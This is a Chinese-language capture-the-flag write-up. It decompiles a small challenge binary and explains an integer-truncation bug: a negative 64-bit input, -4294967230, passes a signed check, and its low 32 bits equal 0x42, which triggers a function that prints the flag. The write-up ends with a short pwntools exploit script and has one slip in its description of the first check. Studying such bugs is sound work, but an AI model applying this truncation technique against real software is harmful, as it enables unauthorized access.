分析
int __cdecl main(int argc, const char **argv, const char **envp)
{
__int64 v4[2]; // [rsp+0h] [rbp-10h] BYREF
v4[1] = __readfsqword(0x28u);
put(argc, argv, envp);
__isoc99_scanf("%ld", v4);
if ( v4[0] > 3 )
exit(-1);
if ( LODWORD(v4[0]) == B )
b4ckdo0r();
return 0;
}
unsigned __int64 b4ckdo0r()
{
char *argv[5]; // [rsp+0h] [rbp-30h] BYREF
unsigned __int64 v2; // [rsp+28h] [rbp-8h]
v2 = __readfsqword(0x28u);
argv[0] = "/bin/cat";
argv[1] = "flag";
argv[2] = 0LL;
execve("/bin/cat", argv, 0LL);
return v2 - __readfsqword(0x28u);
}
本题主要是要让程序执行到b4ckdo0r函数,但是需要在函数中满足输入的数值大于3和等于0x42
此题关键点在LODWORD(v4[0]),主要是LODWORD(**LODWORD 是一个在编程中用来从更大的整数类型中提取低位部分(低阶双字)的宏或函数。LODWORD 通常用于从 64 位整数(如 long long 或 __int64)中提取低 32 位,以得到一个 DWORD(即 unsigned long)类型的值。),我们输入的是64位的数据,比对需要小于3的时候使用的是64位的数据,但是在比对是否位0x42时,使用的是低32位的数据
解题
思路
将输入的数据设置为负数(满足第一个判断),但是被截取为32位时候要等于0x42(满足第二个判断),比如输入数值为-4294967230,对应的补码(在系统里面负数使用补码表示)为:FFFF FFFF 0000 0042,64位时,第一位为符号位,此处第一位是1,即为负数,截取为32位时,只剩下0000 0042,等于0x42,即可进入到执行b4ckdo0r函数
payload
from pwn import *
sh=process('./pwn')
#sh=remote('101.133.164.228',32295)
sh.recv()
sh.send(b'-4294967230'+b'\n') #此处是payload
sh.recv()
a=sh.recv()
print(a)